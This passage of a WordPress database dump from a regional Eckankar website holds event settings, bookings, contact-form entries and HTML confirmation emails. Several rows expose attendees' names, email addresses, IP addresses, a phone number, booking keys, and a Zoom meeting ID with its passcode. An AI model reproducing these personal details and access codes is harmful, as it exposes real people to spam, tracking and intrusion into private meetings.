<![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(171971,267408,'mec_event_status','EventScheduled'),(171972,267408,'mec_moved_online_link',''),(171973,267408,'mec_cancelled_reason',''),(171974,267408,'mec_display_cancellation_reason_in_single_page',''),(171975,267408,'protect_children',''),(171976,267408,'passster_activate_global_protection',NULL),(171977,267408,'passster_activate_protection',NULL),(171978,267408,'passster_protection_type','password'),(171979,267408,'boldgrid_hide_page_title','0'),(171980,267408,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(171981,267408,'boldgrid_in_page_containers','1'),(171985,267408,'_dp_original','266540'),(171983,267408,'_thumbnail_id','267409'),(171984,267408,'_wp_old_date','2022-04-30'),(171986,267408,'_edit_lock','1667406485:2'),(171987,267408,'_edit_last','2'),(171988,267409,'_wp_attached_file','2022/11/hilltop-walking-1.jpg'),(171989,267409,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:744;s:6:\"height\";i:425;s:4:\"file\";s:29:\"2022/11/hilltop-walking-1.jpg\";s:8:\"filesize\";i:123119;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"hilltop-walking-1-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17576;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"hilltop-walking-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8513;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"hilltop-walking-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30907;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"hilltop-walking-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49239;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"hilltop-walking-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33133;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"hilltop-walking-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(194042,269259,'mec_additional_location_ids','a:0:{}'),(193974,269250,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(193973,269250,'_field_651','(770) 846-0008'),(193972,269250,'_field_653','robertscottbell@gmail.com'),(193971,269250,'_field_652','Bell'),(193970,269250,'_field_654','Robert Scott'),(193969,269249,'_seq_num','88'),(193968,269249,'_form_id','61'),(193967,269249,'_field_649',''),(191805,269105,'_field_654','Thomas'),(191806,269105,'_field_652','Engel'),(191807,269105,'_field_653','engel.thomasj@gmail.com'),(194041,269259,'mec_additional_organizer_ids','a:0:{}'),(194040,269259,'mec_currency','a:0:{}'),(194039,269259,'mec_cost',''),(172022,267414,'_field_133','Debra'),(172023,267414,'_field_134','Kraft'),(172024,267414,'_field_135','debrakraft@diamondspectrums.com'),(172025,267414,'_field_137','membership renewal'),(172026,267414,'_field_138','I was trying to see about renewing my membership online for the coming year, but I can\'t figure out if my monthly donation is ongoing or if I have to submit it again. And, is the monthly donation considered as a separate item from the yearly membership?\n\nThank you for clarifying this for me.'),(172027,267414,'_form_id','13'),(172028,267414,'_seq_num','122'),(172029,267415,'mec_transaction_id','BRH36761'),(172030,267415,'mec_user_id','1000043'),(172031,267415,'mec_verified','1'),(172032,267415,'mec_verification_key','ad6f11cb16aee3140074c7be461d9f76'),(172033,267415,'mec_cancellation_key','7c2dcf1a1995715c41f959a9250fae0e'),(172034,267415,'mec_confirmed','1'),(172035,267415,'mec_event_id','267334'),(172036,267415,'mec_date','1667730600:1667777400'),(172037,267415,'mec_ticket_id',',1,'),(172038,267415,'mec_booking_time','2022-11-06 00:24:04'),(172039,267415,'mec_all_dates','a:0:{}'),(172040,267415,'mec_other_dates','a:0:{}'),(172041,267415,'mec_attention_time','1667730600:1667777400'),(172042,267415,'mec_attention_time_start','1667730600'),(172043,267415,'mec_attention_time_end','1667777400'),(172044,267415,'mec_book_date_submit','20221106002404'),(172045,267415,'mec_booking_location','118'),(172046,267415,'mec_ticket_price_1','0'),(172047,267415,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:6:\"Gordon\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"75.71.185.58\";}}'),(172048,267415,'mec_price','0'),(172049,267415,'mec_gateway','MEC_gateway_free'),(172050,267415,'mec_gateway_label','Free'),(172059,267417,'mec_transaction_id','BJA68504'),(172060,267417,'mec_user_id','1000052'),(172061,267417,'mec_verified','1'),(172062,267417,'mec_verification_key','4103fdd289924f45bec8d8ef270e9846'),(172063,267417,'mec_cancellation_key','5dea22e44823b9ab9aa2acce59482f9c'),(172064,267417,'mec_confirmed','1'),(172065,267417,'mec_event_id','267334'),(172066,267417,'mec_date','1667730600:1667777400'),(172067,267417,'mec_ticket_id',',1,'),(172068,267417,'mec_booking_time','2022-11-06 10:23:53'),(172069,267417,'mec_all_dates','a:0:{}'),(172070,267417,'mec_other_dates','a:0:{}'),(172071,267417,'mec_attention_time','1667730600:1667777400'),(172072,267417,'mec_attention_time_start','1667730600'),(172073,267417,'mec_attention_time_end','1667777400'),(172074,267417,'mec_book_date_submit','20221106102353'),(172075,267417,'mec_booking_location','118'),(172076,267417,'mec_ticket_price_1','0'),(172077,267417,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"Raelinharp@yahoo.com\";s:4:\"name\";s:6:\"Raelin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"71.211.238.43\";}}'),(172078,267417,'mec_price','0'),(172079,267417,'mec_gateway','MEC_gateway_free'),(172080,267417,'mec_gateway_label','Free'),(191466,269013,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:162102;s:12:\"smushed-size\";i:162102;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:162102;s:10:\"compressed\";i:162102;}s:6:\"medium\";a:2:{s:8:\"original\";i:12847;s:10:\"compressed\";i:12475;}s:5:\"large\";a:2:{s:8:\"original\";i:63426;s:10:\"compressed\";i:63426;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5529;s:10:\"compressed\";i:4987;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:40582;s:10:\"compressed\";i:40582;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14707;s:10:\"compressed\";i:14388;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:33186;s:10:\"compressed\";i:33008;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:23843;s:10:\"compressed\";i:23563;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:17336;s:10:\"compressed\";i:16992;}s:8:\"tileview\";a:2:{s:8:\"original\";i:16611;s:10:\"compressed\";i:16433;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:120107;s:10:\"compressed\";i:120107;}}}'),(191465,269013,'smush-info','The file was compressed from 158.30 KB to 158.30 KB, saving 0 percent, using WP-Optimize'),(191464,269013,'smush-complete','1'),(172089,267419,'mec_transaction_id','XVA53791'),(172090,267419,'mec_user_id','1000050'),(172091,267419,'mec_verified','1'),(172092,267419,'mec_verification_key','74d8ac1c0f808e266b2337e7a822a682'),(172093,267419,'mec_cancellation_key','de9166d57faa72423f9b8f3d88eac221'),(172094,267419,'mec_confirmed','1'),(172095,267419,'mec_event_id','267408'),(172096,267419,'mec_date','1668335400:1668382200'),(172097,267419,'mec_ticket_id',',1,'),(172098,267419,'mec_booking_time','2022-11-06 11:29:57'),(172099,267419,'mec_all_dates','a:0:{}'),(172100,267419,'mec_other_dates','a:0:{}'),(172101,267419,'mec_attention_time','1668335400:1668382200'),(172102,267419,'mec_attention_time_start','1668335400'),(172103,267419,'mec_attention_time_end','1668382200'),(172104,267419,'mec_book_date_submit','20221106112957'),(172105,267419,'mec_booking_location','129'),(172106,267419,'mec_ticket_price_1','0'),(172107,267419,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:32:\"Sandy(Tarzana/Encino California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.89.183.33\";}}'),(172108,267419,'mec_price','0'),(172109,267419,'mec_gateway','MEC_gateway_free'),(172110,267419,'mec_gateway_label','Free'),(191463,269013,'original-file','2023/09/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops4a9643f7f3d94a2d4f9082f253a534ee-updraft-pre-smush-original.jpg'),(191462,269012,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:187337;s:12:\"smushed-size\";i:187337;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:187337;s:10:\"compressed\";i:187337;}s:6:\"medium\";a:2:{s:8:\"original\";i:6518;s:10:\"compressed\";i:5976;}s:5:\"large\";a:2:{s:8:\"original\";i:47593;s:10:\"compressed\";i:45386;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3892;s:10:\"compressed\";i:3350;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:25750;s:10:\"compressed\";i:24443;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:11209;s:10:\"compressed\";i:10579;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:29393;s:10:\"compressed\";i:27831;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:14334;s:10:\"compressed\";i:13551;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:9929;s:10:\"compressed\";i:9387;}s:8:\"tileview\";a:2:{s:8:\"original\";i:17254;s:10:\"compressed\";i:16358;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:120973;s:10:\"compressed\";i:116058;}}}'),(191461,269012,'smush-info','The file was compressed from 182.95 KB to 182.95 KB, saving 0 percent, using WP-Optimize'),(191454,269013,'_source_url','https://images.unsplash.com/photo-1484154218962-a197022b5858?ixlib=rb-0.3.5&q=80&fm=jpg&crop=entropy&cs=tinysrgb&w=1600&h=900&fit=crop&s=4a9643f7f3d94a2d4f9082f253a534ee&.png'),(172207,267433,'mec_color',''),(172208,267433,'mec_location_id','129'),(172209,267433,'mec_dont_show_map','0'),(172210,267433,'mec_organizer_id','1'),(172211,267433,'mec_read_more',''),(172212,267433,'mec_more_info',''),(172213,267433,'mec_more_info_title',''),(172214,267433,'mec_more_info_target','_self'),(172215,267433,'mec_cost',''),(172216,267433,'mec_currency','a:0:{}'),(172217,267433,'mec_additional_organizer_ids','a:0:{}'),(172218,267433,'mec_additional_location_ids','a:0:{}'),(172219,267433,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-22\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"4\";}}'),(172220,267433,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:1:\"4\";}'),(172221,267433,'mec_certain_weekdays','a:0:{}'),(172222,267433,'mec_allday','0'),(172223,267433,'one_occurrence','0'),(172224,267433,'mec_hide_time','0'),(172225,267433,'mec_hide_end_time','0'),(172226,267433,'mec_comment',''),(172227,267433,'mec_timezone','global'),(172228,267433,'mec_countdown_method','global'),(172229,267433,'mec_public','1'),(172230,267433,'mec_start_date','2023-01-22'),(172231,267433,'mec_start_time_hour','11'),(172232,267433,'mec_start_time_minutes','45'),(172233,267433,'mec_start_time_ampm','AM'),(172234,267433,'mec_start_day_seconds','42300'),(172235,267433,'mec_end_date','2023-01-22'),(172236,267433,'mec_end_time_hour','1'),(172237,267433,'mec_end_time_minutes','0'),(172238,267433,'mec_end_time_ampm','PM'),(172239,267433,'mec_end_day_seconds','46800'),(172240,267433,'mec_repeat_status','1'),(172241,267433,'mec_repeat_type','advanced'),(172242,267433,'mec_repeat_interval','1'),(172243,267433,'mec_repeat_end','occurrences'),(172244,267433,'mec_repeat_end_at_occurrences','3'),(172245,267433,'mec_repeat_end_at_date',''),(172246,267433,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(172247,267433,'mec_in_days',''),(172248,267433,'mec_not_in_days',''),(172249,267433,'mec_hourly_schedules','a:0:{}'),(172250,267433,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(172251,267433,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:54:\"Online Book Discussion - \'Those Wonderful ECK Masters\'\";s:22:\"ticket_start_time_hour\";s:2:\"11\";s:24:\"ticket_start_time_minute\";s:2:\"45\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"01\";s:22:\"ticket_end_time_minute\";s:1:\"0\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(172252,267433,'mec_fees_global_inheritance','1'),(172253,267433,'mec_fees','a:0:{}'),(172254,267433,'mec_ticket_variations_global_inheritance','1'),(172255,267433,'mec_ticket_variations','a:0:{}'),(172256,267433,'mec_reg_fields_global_inheritance','1'),(172257,267433,'mec_reg_fields','a:0:{}'),(172258,267433,'mec_bfixed_fields','a:0:{}'),(172259,267433,'mec_op','a:0:{}'),(172260,267433,'mec_fields','a:0:{}'),(172261,267433,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6028:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: 844 4204 1787</b><br />\r\n<b>Passcode:</b> 369369</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09\">https://us02web.zoom.us/j/84442041787?pwd=WDRDeHRxTkJGeUdsNlQxYS9uN0tRdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2023</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:31:\"Admin  - New Event Registration\";s:7:\"content\";s:10044:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" 